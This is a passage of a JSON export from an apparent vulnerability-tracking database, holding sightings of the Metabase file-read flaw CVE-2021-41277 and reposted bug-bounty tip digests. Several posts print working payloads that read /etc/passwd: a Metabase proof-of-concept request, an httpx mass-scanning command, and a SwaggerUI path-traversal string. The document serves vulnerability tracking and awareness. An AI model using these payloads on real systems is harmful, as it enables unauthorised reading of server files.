(Nov 1-30)\nCVE-2021-22205 - GitLab CE/EE RCE\nhttps://t.me/cybersecuritytechnologies/4602\nCVE-2021-30883 - iOS IOMFB Vuln\nhttps://t.me/cybersecuritytechnologies/4497\nCVE-2021-3064 - Memory Corruption in PAN-OS GlobalProtect Portal/Gateway Interfaces\nhttps://t.me/cybersecuritytechnologies/4724\nCVE-2021-41379 - Windows Installer LPE\nhttps://t.me/cybersecuritytechnologies/4813\nCVE-2021-42321 - MS Exchange Post-Auth RCE\nhttps://t.me/cybersecuritytechnologies/4809\nCVE-2021-40539 - Zoho ManageEngine Auth. Bypass\nhttps://t.me/cybersecuritytechnologies/4718\nCVE-2021-41277 - MetaBase Arbitrary File Read\nhttps://t.me/cybersecuritytechnologies/4802\nCVE-2021-43267 - Remote Kernel Heap Overflow in TIPC\nhttps://t.me/cybersecuritytechnologies/4678\nCVE-2021-42574 - Unicode Bidirectional override vuln\nhttps://github.com/js-on/CVE-2021-42574\nhttps://github.com/pierDipi/unicode-control-characters-action\nCVE-2021-24084 - Windows MDM LPE\nhttps://t.me/cybersecuritytechnologies/4850", "creation_timestamp": "2021-12-03T11:00:35.000000Z"}, {"uuid": "57f6ac9f-112f-4fa7-8b0f-301405828969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-09)", "content": "", "creation_timestamp": "2026-05-09T00:00:00.000000Z"}, {"uuid": "7ae0a2df-eda6-4487-bcdf-b4bfefb6ec1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/641", "content": "#BugBountyTips of the Day\nNew Feature Alert \ud83d\udea8  [ --SQLi ] Support #MySQL mod_Security & libinjection bypass [** New **]  Have a look :  https://t.co/9ZLO4pJsuG  $ bash  https://t.co/oGQuTKBBAs -u  https://domain.tld/secret --SQLi #bugbountytips #bugbountytip #bugbounty #infosec #cloud #cybersecurity  https://t.co/RKjXMaF2tw\n---\n#BugBounty #bugbountytip #infosec - Do you want to get all subdomains of a host, get the open ports of all of them (using IP address deduplication), and check if there's an HTTP service running? Use the set of tools included in the screenshot! Links in the comments.  https://t.co/qC0FVQCDzA\n---\nPassword reset token was getting leaked in the forgot password Request itself as well as on other endpoint '/verify/'. 2x bounty.@SynackRedTeam #bugbountytips  https://t.co/UYOEXKPAve\n---\nBest of YouTube Channels for Pentester (Part 3)   https://t.co/70lBKdBw16  https://t.co/cRhoJ6D0fC  https://t.co/IeZHpjoDjR  https://t.co/qQRG02wVHv  @rot169 @0xConda @rana__khalil @NahamSec #infosec #cybersecurity #pentesting #oscp #bugbounty\n---\nEl Curso Virtual de Hacking con Kali Linux est\u00e1 disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics \u2623 \u2705 M\u00e1s informaci\u00f3n en:  https://t.co/lsfm4jifRQ  https://t.co/pyXzMnVOyv\n---\nBest of Web Penetration Testing (Part 4)  Credit @trbughunters   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip4  https://t.co/6bPVxzGUTI\n---\nSmall to medium size businesses are using WordPress, Learn how to recon and hack WordPress websites in a legal penetration testing environment. #bugbountytips #infosec  https://t.co/QpGPHxs7H6\n---\nAPI Security Checklist\ud83d\udd25   https://t.co/7tW3yfUsEy  #bugbounty #bugbountytips #apisecurity #apipentesting #checklist\n---\nCVE-2021-41277 MetaBase Arbitrary File Read  MetaBase < 0.40.5 1.0.0 <= MetaBase < 1.40.5   https://t.co/TtJHu6lvr1  PoC: GET /api/geojson?url=file:/etc/passwd HTTP/1.1  #CVE #BugBounty #bugbountytips #infosec #vulnerable", "creation_timestamp": "2021-11-22T13:37:04.000000Z"}, {"uuid": "5b54b1f6-6038-4c88-9bfe-13ea18bd2e0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/644", "content": "#BugBountyTips of the Day\nYay, I was awarded a $7,500 bounty on @Hacker0x01 !  https://t.co/omBwPCLeT7 #TogetherWeHitHarder with @naglinagli   @YahooSecurity and @TheParanoids  once again show why they can be the best program to hack on, and are one of the most fair programs around.  #BugBounty\n---\nLFI in #SwaggerUI   #bugbountytips   #bugbountytip  add this payload for your LFI word list   /v1/docs//..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd HTTP/1.1  #NOTE its not working from browser  https://t.co/RKUhGwEmSZ\n---\nBest of SSRF Cheatsheet  Credit @d0nut  #infosec #cybersecurity #pentesting #oscp #cheatsheet #burpsuite #bugbounty #bugbountytips #ssrf #vulnerabilities  https://t.co/4orqpOIEIQ\n---\n#bugbountytips #bugbounty #CVE-2021-41277 Metabase Custom GeoJSON Map file inclusion    https://domain/api/geojson?url=file:///etc/passwd   httpx -l IPlist.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string \"root:x:0:0\"  https://t.co/TnXoIpVvfd\n---\nI am predicting this to be an excellent #book to add to your 2022 list for #webapp #security and #bugbounty hunting. Thank you Corey Ball for sharing your knowledge on this important topic!  #infosec #recon #pentest #api #bugbountytips #websecurity   https://t.co/BVFL57rKx1", "creation_timestamp": "2021-11-23T13:37:04.000000Z"}, {"uuid": "899437f7-bd1c-48fb-bd3d-49f22fe9a9f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/640", "content": "#BugBountyTips of the Day\nFew months ago i was awarded $10,000 from microsoft for finding a security vulnerability on their web application. now the bug has been patched and got the acknowledgment on their HOF :)  #bugbounty #cybersecurity #news #microsoft #ethicalhacking #bugbountytips #bounty  https://t.co/BCCG7TzP8w\n---\nRed Team Toolkit \ud83e\uddf0 - An Open-Source Django Offensive Web-App that contains useful offensive tools used in the red-teaming activity.  \u00bb  https://t.co/nl4OewP3f5  #cybersecurity #infosec #security  #cyber #informationsecurity #redteam #redteaming #bugbounty #bugbountytips  https://t.co/3ZEmmOSpyo\n---\nJust published a write-up on Account Takeover due to OAuth Misconfiguration + CSRF + XSS and Weak CSP.    https://t.co/lslyFhDmbF  #Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips\n---\nReally excited for this Precious gift from GoogleVRP team.   Thanks for selecting me.  #infosec #googlevrp #bugbounty  https://t.co/jVFi2IxgMG\n---\nBest of Web Penetration Testing  Credit @sec_r0   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/nPepuxs3WR\n---\nBest of Web Penetration Testing   Credit @sec_r0  #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/jq1DnJ34gl\n---\nThere are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for  CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly  : )  #bugbounty  https://t.co/FPQTir4bE2\n---\nwhich wordlist you use for subdomain brute !!!  #bugbountydiscussion #bugbounty #infosec\n---\nI've pushed a nuclei template to detect this misconfiguration An unauthenticated api endpoint requiring a URL parameter, with insufficient validation that lead to LFI. ( CVE-2021-41277 ).   https://t.co/shrTv2gr85  Source :  https://t.co/ByzKbMFX8m  #bugbounty #bugbountytips 1/2  https://t.co/r72gDHNYWt\n---\nBest of Web Penetration Testing (Part 3)  Credit @hackerscrolls   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/1WuKhFEXMa", "creation_timestamp": "2021-11-21T13:37:04.000000Z"}, {"uuid": "3821b76d-e1b8-4860-80f0-bade290c1829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-17)", "content": "", "creation_timestamp": "2026-05-17T00:00:00.000000Z"}, {"uuid": "2e2019dd-2c10-422c-84bc-0f33d2c47870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-18)", "content": "", "creation_timestamp": "2026-05-18T00:00:00.000000Z"}, {"uuid": "e2c692ef-2512-44c0-928d-96f084ffa428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-29)", "content": "", "creation_timestamp": "2026-05-29T00:00:00.000000Z"}]}